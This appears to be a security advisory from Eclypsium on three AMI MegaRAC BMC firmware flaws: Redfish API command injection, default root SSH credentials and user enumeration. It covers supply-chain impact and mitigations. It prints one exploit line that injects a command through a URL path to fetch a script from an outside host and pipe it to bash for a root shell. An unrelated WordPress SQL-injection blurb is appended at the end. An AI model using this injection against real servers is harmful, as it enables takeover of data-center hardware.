These vulnerabilities pose a major risk to the technology supply chain that underlies cloud computing. In short, vulnerabilities in a component supplier affect many hardware vendors, which in turn can pass on to many cloud services. As such these vulnerabilities can pose a risk to servers and hardware that an organization owns directly as well as the hardware that supports the cloud services that they use.

BMCs are designed to provide administrators with near total and remote control over the servers they manage. AMI is a leading provider of BMCs and BMC firmware to a wide range of hardware vendors and cloud service providers. As a result, these vulnerabilities potentially affect a very large number of devices, and could enable attackers to gain control of or cause damage not only to devices but to data centers and cloud services

The vulnerabilities discovered are addressed by the following CVEs:

*   CVE-2022-40259 – Arbitrary Code Execution via Redfish API
*   CVE-2022-40242 – Default credentials for UID = 0 shell via SSH
*   CVE-2022-2827 – User enumeration via API

The impact of exploiting these vulnerabilities include remote control of compromised servers, remote deployment of malware, ransomware and firmware implants, and server physical damage (bricking). At this time, it is unknown whether these vulnerabilities are under active exploitation.

These risks are magnified by MegaRAC’s position as the world’s leading provider of BMC remote management firmware, sitting at the top of the BMC supply chain. This firmware is a foundational component of modern computing found in hundreds of thousands of servers in data centers, server farms, and cloud infrastructure around the world. And since devices in these environments typically standardize on a hardware configuration, a vulnerable configuration could likely be shared across thousands of devices. Additionally, some of this research was enabled by the discovery of a substantial amount of AMI intellectual property on the Internet. The availability of this information could naturally increase the likelihood of attacks in the wild. 

Eclypsium Research has been following a Coordinated Vulnerability Disclosure process, including AMI and other affected parties. Additionally, AMI and Eclypsium have reached out to multiple parties who are working to determine the scope of impacted products and services.

**About MegaRAC Baseboard Management Controllers (BMCs)**

Baseboard Management Controllers (BMCs) are powerful and privileged components that provide out-of-band management for modern servers. For all intents and purposes, a BMC is a fully functional independent computer within a server, equipped with its own independent power, firmware, memory, and networking stack. This allows remote administrators to control virtually everything on the device from low-level hardware settings to managing the host operating system, virtual hosts, applications, or data. The BMC can allow administrators to manage the host even when the host itself is powered off. 

The unique power and capabilities of BMCs make them particularly dangerous if compromised by attackers. Recently, attackers used BMC implants known as iLOBleed to attack data centers and completely wipe the disks of servers. Just as importantly, iLOBleed used the unique powers of firmware to do this repeatedly. Since the malicious code was hidden within the BMC firmware, the implant was able to persist even after the server operating system was reinstalled, enabling the attacker to repeat the cycle of destroying data after the server was recovered. Additionally, the implant took the added steps of silently preventing the system from updating the BMC firmware while spoofing results to make it appear that the firmware had been updated. While the iLOBleed implants are not directly related to the BMC&C vulnerabilities, they serve as a real-world example of the damage attackers can inflict on a large number of devices with access to their BMCs.

**A Fault Line in the Cloud Supply Chain**

To properly appreciate the scope of the BMC&C vulnerabilities, it is important to understand the role AMI MegaRAC plays in the supply chain of cloud data centers. Naturally, many enterprises are attracted to the cloud due to the ability to abstract computing resources from the cost and ongoing maintenance of physical hardware. However, clouds still ultimately run on hardware – and that translates to vast numbers of servers from many different vendors.

MegaRAC BMC firmware is one of the common threads that connects much of the hardware that underlies the cloud. As a result, any vulnerability in MegaRAC can easily spread through the extended supply chain to affect dozens of vendors and potentially millions of servers. Additionally, in order to abstract computing from the hardware, it is critical that the physical servers within a data center are interchangeable. To this end, cloud providers standardize on server components, hardware configurations, firmware & operating system versions, and hypervisor software. So if a vulnerable BMC is used in a data center environment, it is highly likely that hundreds or thousands of devices will share that same vulnerability. In the context of an attack, this could potentially put entire clouds at risk. 

**Discovery Process**

In August 2022, Eclypsium Research was made aware of a leak of intellectual property, purported to come from AMI, which had been posted online. After downloading and reviewing the data, it appeared legitimate, and since there was a chance others had accessed it the decision was made to look for vulnerabilities in case malicious actors were doing the same. The focus quickly narrowed down to the Redfish API, as it is remotely accessible and a first choice for attackers. 

**Vulnerability Details**

*   CVE-2022-40259 – Arbitrary Code Execution via Redfish API
*   CVE-2022-40242 – Default credentials for UID = 0 shell via SSH
*   CVE-2022-2827 – User enumeration via API

**BMC&C Attack Scenario****CVE-2022-40259 – Arbitrary Code Execution via Redfish API**

CVSS v3.1 Score : **9.9 Critical** (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)

To find this issue, initially we reviewed for potentially dangerous calls such as command execution calls. We narrowed it down only to calls exposed to the user, and there was one sitting in the Redfish API implementation. The only complication is the attack sits in the path parameter, but it is not URL-decoded by the framework, so the exploit needs to be crafted specially to both be valid per URL and valid per bash shell command. The exploit looks roughly as follows (note that we have edited out a few details – like where it actually is – so as not to release a ready-made exploit for attackers):

http://<device>/super/secret/path;curl${IFS}domain.com|bash;

The path needs to be sent as-is in the HTTP request. domain.com needs to host a reverse shell (we will not be providing one, but it uses an available scripting language present on-board and is otherwise unremarkable). This exploit leads straight into a UID = 0 shell (UID = 0 user, confusingly, is called sysadmin), and does require the attacker to have a minimum access level on the device (Callback or up).

**CVE-2022-40242 – Default credentials for UID = 0 shell via SSH**

CVSS v3.1 Score : **8.3 High** (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)

As a second part for enumeration, we looked for available credentials in normal locations for a Linux system. We found a hash in /etc/shadow for the sysadmin user and managed to crack it. The password looked like a default, and we managed to find backreferences to it going as far back as 2014 by other people. Finding them is left as an exercise to the reader.

**CVE-2022-2827 – User enumeration via API**

CVSS v3.1 Score : **7.5 High** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

When making a request for a password reset, one of the parameters can be manipulated in such a way that it is possible to determine whether the user exists or not, with no prior knowledge other than the username itself. The vulnerability also allows an attacker to test for the presence of user accounts by iterating through a list of possible account names.

**Attack Scenarios**

The first two CVEs (CVE-2022-40259, CVE-2022-40242) lead straight into the UID = 0 administrative shell, with no further escalation necessary. CVE-2022-40259 requires prior access to at least a low-privilege account (Callback privileges or higher), while CVE-2022-40242 requires nothing more than remote access to the device, albeit on some devices this account may be disabled. The third vulnerability (CVE-2022-2827) would require additional steps for full exploitation; e.g. it allows for pinpointing pre-existing users and does not lead into a shell but would provide an attacker a list of targets for brute force or credential stuffing attacks.

These vulnerabilities can pose serious risks in any case in which an attacker has access to an affected server’s BMC. As a security best practice, BMCs should not be directly exposed to the Internet and scans performed after the initial disclosure indicate that public exposure is relatively low compared to recent high-profile vulnerabilities in other infrastructure products. However, it is quite common to find BMCs that are exposed due to either misconfigurations or poor security hygiene. Additionally, these vulnerabilities could be exploited by an attacker that has gained initial access into a data center or administrative network. As data centers tend to standardize on specific hardware platforms, any BMC-level vulnerability would most likely apply to large numbers of devices and could potentially affect an entire data center and the services that it delivers. Due to the nature and location of BMC vulnerabilities, detecting exploitation is complex as standard EDR & AV products focus on the operating system, not the underlying firmware. 

**Mitigations**

*   Ensure that all remote server management interfaces (e.g. Redfish, IPMI) and BMC subsystems in their environments are on their dedicated management networks and are not exposed externally, and ensure internal BMC interface access is restricted to administrative users with ACLs or firewalls.  
    
*   Review vendor default configurations of device firmware to identify and disable built-in administrative accounts and/or use remote authentication where available.  
    
*   Perform regular software and firmware updates in critical servers.  
    
*   Ensure that vulnerability assessments include remote server management subsystems (like MegaRAC, iDRAC, iLO, etc.) and critical firmware.  
    
*   Ensure that all critical firmware in servers is regularly monitored for indicators of compromise or unauthorized modifications.  
    
*   Perform supply chain checks of new equipment. Assess that all new servers have major vulnerabilities patched and the latest firmware updates installed.  
    
*   For Eclypsium customers, the platform will provide coverage of recently discovered vulnerabilities through a new functionality that will dynamically update scan results. 
*   Eclypsium has collaborated with Greynoise to provide detection signatures which will provide threat intelligence should any malicious actor begin indiscriminate exploitation attempts of CVE-2022-40259 or CVE-2022-2827.

**Conclusions**

Securing the firmware supply chain is a complex problem, and vulnerabilities found at the top of the chain present substantial risk due to the way OEMs integrate code into their products. Firmware vulnerabilities are non-trivial to remediate due the fact their location in the computing stack is not optimized for patching at scale. Furthermore, standardization of hosting & cloud providers on server components means these vulnerabilities can easily impact hundreds of thousands, possibly millions of systems. 

As attackers shift their focus from user facing operating systems to the lower level embedded code which hardware relies on, compromise becomes harder to detect and exponentially more complex to remediate. While compromise of a server OS can be resolved with a wipe & reinstallation, firmware compromise has the potential to remain beyond reinstallation and even more drastic measures like hard drive replacement. Security research into this area is imperative to stay a step ahead of the attacks and protect the foundation upon which modern computing relies on.

CVE-2022-40259: Supply Chain Vulnerabilities Put Server Ecosystem At Risk - Eclypsium

The Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line, WeChat, Email, SMS, Call Button WordPress plugin before 3.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin.

Tag

#perl